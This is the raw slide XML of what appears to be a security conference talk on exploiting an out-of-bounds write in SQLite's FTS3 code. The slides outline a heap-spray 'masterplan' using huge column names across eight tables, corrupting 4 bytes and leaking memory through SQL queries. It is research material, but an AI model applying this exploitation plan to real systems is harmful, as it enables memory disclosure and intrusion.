              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>
            <a:ext cx="4984493" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>
            <a:ext cx="2338316" cy="209550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Curved Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>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5203242"/>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Masterplan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10934700" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spray a HUGE Column array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>, as many to fill more than 2GB’s of memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>the vulnerable apple fts3 allocation in front of the spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Trigger the vulnerability, and corrupt one of the column object’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>zName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Corrupt the field so that it points to an address that we want to leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Afterwards, try to leak the value through SQL statements.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184987" y="2239344"/>
            <a:ext cx="4320074" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is problematic</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1850626662"/>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 y="1"/>
            <a:ext cx="12192000" cy="1951264"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="2287161"/>
            <a:ext cx="11579289" cy="4399389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Maximum size of column object array : 0x20 * 2000 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xFA00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>No way to bypass this. It’s hardcoded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="221598"/>
            <a:ext cx="11579289" cy="1509231"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> // from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sqliteLimit.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifndef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQLITE_MAX_COLUMN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># define SQLITE_MAX_COLUMN 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>endif</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327645056"/>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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>efined Masterplan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10934700" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Place the vulnerable apple fts3 allocation in front of the spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Query all 8 tables with “SELECT 256MB_really_long_column_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tableN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>”. Exactly 1 table will return an error that no such column exists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Repeat with smaller chunks, by using a divide-and-conquer approach</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3191585736"/>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2207491"/>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0" name="Rectangle 49"/>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Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236355" y="692725"/>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Rectangle 51"/>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Rectangle 52"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2881737" y="415637"/>
            <a:ext cx="812798"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2687773" y="692725"/>
            <a:ext cx="17087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Left Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052936" y="277091"/>
            <a:ext cx="277088" cy="220749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66" name="TextBox 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212425" y="1211559"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>500MB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Rectangle 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212424" y="138544"/>
            <a:ext cx="11776375" cy="24568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541142798"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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609943439"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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AAAAAAAAAAAAA……………………….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Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938645" y="420253"/>
            <a:ext cx="118092" cy="129310"/>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2" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4236023" y="311231"/>
            <a:ext cx="277086" cy="753750"/>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4754245" y="632855"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1322871646"/>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9236355" y="692725"/>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7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>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2881737" y="415637"/>
            <a:ext cx="812798"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87773" y="692725"/>
            <a:ext cx="17087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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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Rectangle 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938645" y="420253"/>
            <a:ext cx="118092" cy="129310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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 name="Curved Connector 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4236023" y="311231"/>
            <a:ext cx="277086" cy="753750"/>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4754245" y="632855"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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9" name="Curved Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="3938644" y="484907"/>
            <a:ext cx="118091" cy="4515381"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -518517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">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0269013"/>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6208" y="277091"/>
            <a:ext cx="10483273" cy="6419273"/>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376208" y="580043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Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="5283199"/>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Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="476596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a:off x="1376208" y="4248724"/>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Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="3731486"/>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Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="3214248"/>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Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="2697010"/>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ectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="2179772"/>
            <a:ext cx="10483274" cy="517237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC0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Left Brace 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052936" y="277091"/>
            <a:ext cx="277088" cy="6419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26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290973" y="3317450"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>2.5GB</a:t>
            </a:r>
